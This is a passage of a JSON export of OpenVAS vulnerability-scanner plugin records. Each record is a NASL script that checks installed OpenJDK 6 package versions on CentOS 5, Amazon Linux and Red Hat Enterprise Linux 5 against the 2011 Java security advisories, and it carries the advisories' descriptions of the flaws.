a\n chosen plain text attack against a connection mixing trusted and untrusted\n data could use this flaw to recover portions of the trusted data sent over\n the connection. (CVE-2011-3389)\n \n Note: This update mitigates the CVE-2011-3389 issue by splitting the first\n application data record byte to a separate SSL/TLS protocol record. This\n mitigation may cause compatibility issues with some SSL/TLS implementations\n and can be ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"java on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-October/018122.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881447\");\n script_version(\"$Revision: 9352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:13:02 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:53:03 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3389\", \"CVE-2011-3521\", \"CVE-2011-3544\", \"CVE-2011-3547\",\n \"CVE-2011-3548\", \"CVE-2011-3551\", \"CVE-2011-3552\", \"CVE-2011-3553\",\n \"CVE-2011-3554\", \"CVE-2011-3556\", \"CVE-2011-3557\", \"CVE-2011-3558\",\n \"CVE-2011-3560\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2011:1380\");\n script_name(\"CentOS Update for java CESA-2011:1380 centos5 x86_64\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:02:45", "references": ["2011:1380", "http://lists.centos.org/pipermail/centos-announce/2011-October/018121.html"], "pluginID": "1361412562310881023", "description": "Check for the Version of java", "edition": 4, "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "published": "2011-10-21T00:00:00", "title": "CentOS Update for java CESA-2011:1380 centos5 i386", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310881023", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881023", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2011:1380 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 6 Java Runtime Environment and the\n OpenJDK 6 Software Development Kit.\n\n A flaw was found in the Java RMI (Remote Method Invocation) registry\n implementation. A remote RMI client could use this flaw to execute\n arbitrary code on the RMI server running the registry. (CVE-2011-3556)\n \n A flaw was found in the Java RMI registry implementation. A remote RMI\n client could use this flaw to execute code on the RMI server with\n unrestricted privileges. (CVE-2011-3557)\n \n A flaw was found in the IIOP (Internet Inter-Orb Protocol) deserialization\n code. An untrusted Java application or applet running in a sandbox could\n use this flaw to bypass sandbox restrictions by deserializing\n specially-crafted input. (CVE-2011-3521)\n \n It was found that the Java ScriptingEngine did not properly restrict the\n privileges of sandboxed applications. An untrusted Java application or\n applet running in a sandbox could use this flaw to bypass sandbox\n restrictions. (CVE-2011-3544)\n \n A flaw was found in the AWTKeyStroke implementation. An untrusted Java\n application or applet running in a sandbox could use this flaw to bypass\n sandbox restrictions. (CVE-2011-3548)\n \n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the Java2D code used to perform transformations of graphic shapes\n and images. An untrusted Java application or applet running in a sandbox\n could use this flaw to bypass sandbox restrictions. (CVE-2011-3551)\n \n An insufficient error checking flaw was found in the unpacker for JAR files\n in pack200 format. A specially-crafted JAR file could use this flaw to\n crash the Java Virtual Machine (JVM) or, possibly, execute arbitrary code\n with JVM privileges. (CVE-2011-3554)\n \n It was found that HttpsURLConnection did not perform SecurityManager checks\n in the setSSLSocketFactory method. An untrusted Java application or applet\n running in a sandbox could use this flaw to bypass connection restrictions\n defined in the policy. (CVE-2011-3560)\n \n A flaw was found in the way the SSL 3 and TLS 1.0 protocols used block\n ciphers in cipher-block chaining (CBC) mode. An attacker able to perform a\n chosen plain text attack against a connection mixing trusted and untrusted\n data could use this flaw to recover portions of the trusted data sent over\n the connection. (CVE-2011-3389)\n \n Note: This update mitigates the CVE-2011-3389 issue by splitting the first\n application data record byte to a separate SSL/TLS protocol record. This\n mitigation may cause compatibility issues with some SSL/TLS implementations\n and can be ... \n\n Description truncated, for more information please check the Reference URL\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"java on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-October/018121.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881023\");\n script_version(\"$Revision: 9371 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:55:06 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-21 16:31:29 +0200 (Fri, 21 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2011:1380\");\n script_cve_id(\"CVE-2011-3389\", \"CVE-2011-3521\", \"CVE-2011-3544\", \"CVE-2011-3547\",\n \"CVE-2011-3548\", \"CVE-2011-3551\", \"CVE-2011-3552\", \"CVE-2011-3553\",\n \"CVE-2011-3554\", \"CVE-2011-3556\", \"CVE-2011-3557\", \"CVE-2011-3558\",\n \"CVE-2011-3560\");\n script_name(\"CentOS Update for java CESA-2011:1380 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-02T14:36:45", "references": ["https://alas.aws.amazon.com/ALAS-2011-10.html"], "pluginID": "1361412562310120500", "description": "Amazon Linux Local Security Checks", "edition": 5, "reporter": "Eero Volotinen", "published": "2015-09-08T00:00:00", "title": "Amazon Linux Local Check: alas-2011-10", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Amazon Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2018-10-01T00:00:00", "id": "OPENVAS:1361412562310120500", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120500", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2011-10.nasl 6579 2017-07-06 13:45:14Z cfischer$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120500\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 11:27:06 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: alas-2011-10\");\n script_tag(name:\"solution\", value:\"Run yum update java-1.6.0-openjdk to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2011-10.html\");\n script_cve_id(\"CVE-2011-3521\", \"CVE-2011-3554\", \"CVE-2011-3556\", \"CVE-2011-3548\", \"CVE-2011-3551\", \"CVE-2011-3552\", \"CVE-2011-3553\", \"CVE-2011-3389\", \"CVE-2011-3547\", \"CVE-2011-3558\", \"CVE-2011-3560\", \"CVE-2011-3544\", \"CVE-2011-3557\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~52.1.9.10.40.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~52.1.9.10.40.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~52.1.9.10.40.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~52.1.9.10.40.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~52.1.9.10.40.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-debuginfo\", rpm:\"java-1.6.0-openjdk-debuginfo~1.6.0.0~52.1.9.10.40.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:56:39", "references": ["2011:1380", "http://lists.centos.org/pipermail/centos-announce/2011-October/018122.html"], "pluginID": "881447", "description": "Check for the Version of java", "edition": 3, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-07-30T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "title": "CentOS Update for java CESA-2011:1380 centos5 x86_64", "type": "openvas", "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2018-01-02T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=881447", "id": "OPENVAS:881447", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2011:1380 centos5 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 6 Java Runtime Environment and the\n OpenJDK 6 Software Development Kit.\n\n A flaw was found in the Java RMI (Remote Method Invocation) registry\n implementation. A remote RMI client could use this flaw to execute\n arbitrary code on the RMI server running the registry. (CVE-2011-3556)\n \n A flaw was found in the Java RMI registry implementation. A remote RMI\n client could use this flaw to execute code on the RMI server with\n unrestricted privileges. (CVE-2011-3557)\n \n A flaw was found in the IIOP (Internet Inter-Orb Protocol) deserialization\n code. An untrusted Java application or applet running in a sandbox could\n use this flaw to bypass sandbox restrictions by deserializing\n specially-crafted input. (CVE-2011-3521)\n \n It was found that the Java ScriptingEngine did not properly restrict the\n privileges of sandboxed applications. An untrusted Java application or\n applet running in a sandbox could use this flaw to bypass sandbox\n restrictions. (CVE-2011-3544)\n \n A flaw was found in the AWTKeyStroke implementation. An untrusted Java\n application or applet running in a sandbox could use this flaw to bypass\n sandbox restrictions. (CVE-2011-3548)\n \n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the Java2D code used to perform transformations of graphic shapes\n and images. An untrusted Java application or applet running in a sandbox\n could use this flaw to bypass sandbox restrictions. (CVE-2011-3551)\n \n An insufficient error checking flaw was found in the unpacker for JAR files\n in pack200 format. A specially-crafted JAR file could use this flaw to\n crash the Java Virtual Machine (JVM) or, possibly, execute arbitrary code\n with JVM privileges. (CVE-2011-3554)\n \n It was found that HttpsURLConnection did not perform SecurityManager checks\n in the setSSLSocketFactory method. An untrusted Java application or applet\n running in a sandbox could use this flaw to bypass connection restrictions\n defined in the policy. (CVE-2011-3560)\n \n A flaw was found in the way the SSL 3 and TLS 1.0 protocols used block\n ciphers in cipher-block chaining (CBC) mode. An attacker able to perform a\n chosen plain text attack against a connection mixing trusted and untrusted\n data could use this flaw to recover portions of the trusted data sent over\n the connection. (CVE-2011-3389)\n \n Note: This update mitigates the CVE-2011-3389 issue by splitting the first\n application data record byte to a separate SSL/TLS protocol record. This\n mitigation may cause compatibility issues with some SSL/TLS implementations\n and can be ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"java on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-October/018122.html\");\n script_id(881447);\n script_version(\"$Revision: 8267 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-02 07:29:17 +0100 (Tue, 02 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:53:03 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3389\", \"CVE-2011-3521\", \"CVE-2011-3544\", \"CVE-2011-3547\",\n \"CVE-2011-3548\", \"CVE-2011-3551\", \"CVE-2011-3552\", \"CVE-2011-3553\",\n \"CVE-2011-3554\", \"CVE-2011-3556\", \"CVE-2011-3557\", \"CVE-2011-3558\",\n \"CVE-2011-3560\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2011:1380\");\n script_name(\"CentOS Update for java CESA-2011:1380 centos5 x86_64\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:55:24", "references": ["https://www.redhat.com/archives/rhsa-announce/2011-October/msg00011.html", "2011:1380-01"], "pluginID": "870501", "description": "Check for the Version of java-1.6.0-openjdk", "edition": 2, "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "published": "2011-10-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "title": "RedHat Update for java-1.6.0-openjdk RHSA-2011:1380-01", "type": "openvas", "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2017-07-12T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870501", "id": "OPENVAS:870501", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.6.0-openjdk RHSA-2011:1380-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 6 Java Runtime Environment and the\n OpenJDK 6 Software Development Kit.\n\n A flaw was found in the Java RMI (Remote Method Invocation) registry\n implementation. A remote RMI client could use this flaw to execute\n arbitrary code on the RMI server running the registry. (CVE-2011-3556)\n \n A flaw was found in the Java RMI registry implementation. A remote RMI\n client could use this flaw to execute code on the RMI server with\n unrestricted privileges. (CVE-2011-3557)\n \n A flaw was found in the IIOP (Internet Inter-Orb Protocol) deserialization\n code. An untrusted Java application or applet running in a sandbox could\n use this flaw to bypass sandbox restrictions by deserializing\n specially-crafted input. (CVE-2011-3521)\n \n It was found that the Java ScriptingEngine did not properly restrict the\n privileges of sandboxed applications. An untrusted Java application or\n applet running in a sandbox could use this flaw to bypass sandbox\n restrictions. (CVE-2011-3544)\n \n A flaw was found in the AWTKeyStroke implementation. An untrusted Java\n application or applet running in a sandbox could use this flaw to bypass\n sandbox restrictions. (CVE-2011-3548)\n \n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the Java2D code used to perform transformations of graphic shapes\n and images. An untrusted Java application or applet running in a sandbox\n could use this flaw to bypass sandbox restrictions. (CVE-2011-3551)\n \n An insufficient error checking flaw was found in the unpacker for JAR files\n in pack200 format. A specially-crafted JAR file could use this flaw to\n crash the Java Virtual Machine (JVM) or, possibly, execute arbitrary code\n with JVM privileges. (CVE-2011-3554)\n \n It was found that HttpsURLConnection did not perform SecurityManager checks\n in the setSSLSocketFactory method. An untrusted Java application or applet\n running in a sandbox could use this flaw to bypass connection restrictions\n defined in the policy. (CVE-2011-3560)\n \n A flaw was found in the way the SSL 3 and TLS 1.0 protocols used block\n ciphers in cipher-block chaining (CBC) mode. An attacker able to perform a\n chosen plain text attack against a connection mixing trusted and untrusted\n data could use this flaw to recover portions of the trusted data sent over\n the connection. (CVE-2011-3389)\n \n Note: This update mitigates the CVE-2011-3389 issue by splitting the first\n application data record byte to a separate SSL/TLS protocol record. This\n mitigation may cause compatibility issues wi ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"java-1.6.0-openjdk on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2011-October/msg00011.html\");\n script_id(870501);\n script_version(\"$Revision: 6685 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:44:46 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-21 16:31:29 +0200 (Fri, 21 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2011:1380-01\");\n script_cve_id(\"CVE-2011-3389\", \"CVE-2011-3521\", \"CVE-2011-3544\", \"CVE-2011-3547\",\n \"CVE-2011-3548\", \"CVE-2011-3551\", \"CVE-2011-3552\", \"CVE-2011-3553\",\n \"CVE-2011-3554\", \"CVE-2011-3556\", \"CVE-2011-3557\", \"CVE-2011-3558\",\n \"CVE-2011-3560\");\n script_name(\"RedHat Update for java-1.6.0-openjdk RHSA-2011:1380-01\");\n\n script_summary(\"Check for the Version of java-1.6.0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-debuginfo\", 